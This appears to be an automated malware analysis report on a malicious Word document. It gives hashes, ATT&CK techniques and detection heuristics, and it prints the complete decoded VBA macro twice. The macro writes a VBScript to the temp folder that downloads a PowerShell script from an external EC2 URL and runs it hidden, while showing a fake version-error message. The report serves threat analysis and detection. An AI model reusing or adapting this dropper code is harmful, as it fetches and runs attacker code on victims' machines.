Office (OLE) malware analysis — malicious · cfb6072e016f9913

MALICIOUS

Office (OLE)

48.5 KB Created: 2018-01-14 22:30:00 Authoring application: Microsoft Office Word First seen: 2018-02-07

MD5: 7934daf7086bc482a0ac7be20b8f30f2 SHA-1: 20f357b146bdf8258eff441bb496de6656fc147b SHA-256: cfb6072e016f9913ffd9ab3563d436f5cb799bf7ed5834529de862807fdba526

490 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1059.001 PowerShell

The sample contains VBA macros that, when executed, create a VBScript file named 'tribanco.vbs' in the user's temporary directory. This script is designed to download a PowerShell script from 'http://ec2-52-14-24-60.us-east-2.compute.amazonaws.com:8080/trb.ps1' and execute it. The presence of WScript.Shell and PowerShell references, along with the obfuscated shell command containing a URL, strongly indicates a downloader or dropper functionality.

Heuristics 12

ClamAV: Doc.Dropper.Agent-6436614-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6436614-0
VBA macros detected medium 6 related findings OLE_VBA_MACROS

Document contains VBA macro code

Potential Shell call in VBA critical OLE_VBA_SHELL

Potential Shell call in VBA

Matched line in script

Close PayLoadFile
Shell "wscript " + TempDir + "\tribanco.vbs"
msg = "This application appears to be made on an older version of the Microsoft Office product suite. Please have the author save to a newer and supported format. [Error Code: -219]"

WScript.Shell usage critical OLE_VBA_WSCRIPT

WScript.Shell usage

Matched line in script

Print #1, "objFile.Close( )"
Print #1, "Set WshShell = WScript.CreateObject("; """WScript.Shell"""; ")"
Print #1, "WshShell.Run", """powershell -ExecutionPolicy Bypass -WindowStyle Hidden -File C:\Users\"""; "& objNetwork.UserName &"; """\AppData\Local\Temp\trb.ps1"""

PowerShell reference in VBA critical OLE_VBA_PS

PowerShell reference in VBA

Matched line in script

Print #1, "Set WshShell = WScript.CreateObject("; """WScript.Shell"""; ")"
Print #1, "WshShell.Run", """powershell -ExecutionPolicy Bypass -WindowStyle Hidden -File C:\Users\"""; "& objNetwork.UserName &"; """\AppData\Local\Temp\trb.ps1"""
Print #1, "End Sub"

Obfuscated VBA Shell command with URL critical OLE_VBA_OBFUSCATED_SHELL_URL

VBA macro invokes Shell with command text assembled through decoder or string-manipulation functions and includes a URL. This is a high-confidence downloader/dropper pattern, stronger than Shell or URL evidence on their own.
Matched line in script
```
Print #1, "objFile.Close( )"
Print #1, "Set WshShell = WScript.CreateObject("; """WScript.Shell"""; ")"
Print #1, "WshShell.Run", """powershell -ExecutionPolicy Bypass -WindowStyle Hidden -File C:\Users\"""; "& objNetwork.UserName &"; """\AppData\Local\Temp\trb.ps1"""
```

CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call

Matched line in script

Open FilePath For Output As #1
Print #1, "Set objNetwork = CreateObject("; """Wscript.Network"""; ")"
Print #1, "HTTPDownload"; " "; """http://ec2-52-14-24-60.us-east-2.compute.amazonaws.com:8080/trb.ps1"""; ","; """C:\Users\"""; "& objNetwork.UserName &"; """\AppData\Local\Temp\"""

Environ() call (env variable access) low OLE_VBA_ENVIRON

Environ() call (env variable access)
Matched line in script
```
Dim FilePath As String
TempDir = Environ("temp")
FilePath = TempDir + "\tribanco.vbs"
```
Reference to PowerShell high SC_STR_POWERSHELL

Reference to PowerShell
Reference to Windows Script Host high SC_STR_WSCRIPT

Reference to Windows Script Host
LOLBin token sequence in document text high SE_LOLBIN_RUN_COMMAND

Extracted document text contains a Windows script/execution tool name (PowerShell, mshta, cmd, rundll32, regsvr32, …) within 220 characters of a dangerous flag, command verb, or URL. This is a visible 'run this' instruction in HTML/PDF/RTF lure bodies, or — in macro-laden Office files — the macro's own string-pool entries appearing adjacent in extracted text.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://schemas.openxmlformats.org/drawingml/2006/main Referenced by macro
- http://ec2-52-14-24-60.us-east-2.compute.amazonaws.com:8080/trb.ps1Referenced by macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2300 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	2300 bytes
SHA-256: `30e00241a5a21b60ad3f5cf7941055722087b2cd8b52e2a668a34d410810470f`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub WritePayload() Dim PayLoadFile As Integer Dim FilePath As String TempDir = Environ("temp") FilePath = TempDir + "\tribanco.vbs" PayLoadFile = FreeFile Open FilePath For Output As #1 Print #1, "Set objNetwork = CreateObject("; """Wscript.Network"""; ")" Print #1, "HTTPDownload"; " "; """http://ec2-52-14-24-60.us-east-2.compute.amazonaws.com:8080/trb.ps1"""; ","; """C:\Users\"""; "& objNetwork.UserName &"; """\AppData\Local\Temp\""" Print #1, "Sub HTTPDownload( myURL, myPath )" Print #1, "Dim i, objFile, objFSO, objHTTP, strFile, strMsg" Print #1, "Const ForReading = 1, ForWriting = 2, ForAppending = 8" Print #1, "Set objFSO = CreateObject("; """Scripting.FileSystemObject"""; ")" Print #1, "If objFSO.FolderExists( myPath ) Then" Print #1, "strFile = objFSO.BuildPath( myPath, Mid( myURL, InStrRev(myURL,"; """/"""; ") + 1 ) )" Print #1, "ElseIf objFSO.FolderExists( Left( myPath, InStrRev( myPath,"; """\"""; ") - 1 ) ) Then" Print #1, "strFile = myPath" Print #1, "End If" Print #1, "Set objFile = objFSO.OpenTextFile( strFile, ForWriting, True)" Print #1, "Set objHTTP = CreateObject( "; """WinHttp.WinHttpRequest.5.1"""; ")" Print #1, "objHTTP.Open "; " "; """GET"""; " "; ","; "myURL,"; "False" Print #1, "objHTTP.Send" Print #1, "For i = 1 To LenB( objHTTP.ResponseBody )" Print #1, "objFile.Write Chr( AscB( MidB( objHTTP.ResponseBody, i, 1) ) )" Print #1, "Next" Print #1, "objFile.Close( )" Print #1, "Set WshShell = WScript.CreateObject("; """WScript.Shell"""; ")" Print #1, "WshShell.Run", """powershell -ExecutionPolicy Bypass -WindowStyle Hidden -File C:\Users\"""; "& objNetwork.UserName &"; """\AppData\Local\Temp\trb.ps1""" Print #1, "End Sub" Close PayLoadFile Shell "wscript " + TempDir + "\tribanco.vbs" msg = "This application appears to be made on an older version of the Microsoft Office product suite. Please have the author save to a newer and supported format. [Error Code: -219]" intResponse = MsgBox(msg, 16, Title) Application.Quit End Sub

SHA-256: 30e00241a5a21b60ad3f5cf7941055722087b2cd8b52e2a668a34d410810470f

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub WritePayload()
Dim PayLoadFile As Integer
Dim FilePath As String
TempDir = Environ("temp")
FilePath = TempDir + "\tribanco.vbs"
PayLoadFile = FreeFile
Open FilePath For Output As #1
Print #1, "Set objNetwork = CreateObject("; """Wscript.Network"""; ")"
Print #1, "HTTPDownload"; " "; """http://ec2-52-14-24-60.us-east-2.compute.amazonaws.com:8080/trb.ps1"""; ","; """C:\Users\"""; "& objNetwork.UserName &"; """\AppData\Local\Temp\"""
Print #1, "Sub HTTPDownload( myURL, myPath )"
Print #1, "Dim i, objFile, objFSO, objHTTP, strFile, strMsg"
Print #1, "Const ForReading = 1, ForWriting = 2, ForAppending = 8"
Print #1, "Set objFSO = CreateObject("; """Scripting.FileSystemObject"""; ")"
Print #1, "If objFSO.FolderExists( myPath ) Then"
Print #1, "strFile = objFSO.BuildPath( myPath, Mid( myURL, InStrRev(myURL,"; """/"""; ") + 1 ) )"
Print #1, "ElseIf objFSO.FolderExists( Left( myPath, InStrRev( myPath,"; """\"""; ") - 1 ) ) Then"
Print #1, "strFile = myPath"
Print #1, "End If"
Print #1, "Set objFile = objFSO.OpenTextFile( strFile, ForWriting, True)"
Print #1, "Set objHTTP = CreateObject( "; """WinHttp.WinHttpRequest.5.1"""; ")"
Print #1, "objHTTP.Open "; " "; """GET"""; " "; ","; "myURL,"; "False"
Print #1, "objHTTP.Send"
Print #1, "For i = 1 To LenB( objHTTP.ResponseBody )"
Print #1, "objFile.Write Chr( AscB( MidB( objHTTP.ResponseBody, i, 1) ) )"
Print #1, "Next"
Print #1, "objFile.Close( )"
Print #1, "Set WshShell = WScript.CreateObject("; """WScript.Shell"""; ")"
Print #1, "WshShell.Run", """powershell -ExecutionPolicy Bypass -WindowStyle Hidden -File C:\Users\"""; "& objNetwork.UserName &"; """\AppData\Local\Temp\trb.ps1"""
Print #1, "End Sub"
Close PayLoadFile
Shell "wscript " + TempDir + "\tribanco.vbs"
msg = "This application appears to be made on an older version of the Microsoft Office product suite. Please have the author save to a newer and supported format. [Error Code: -219]"
intResponse = MsgBox(msg, 16, Title)
Application.Quit
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.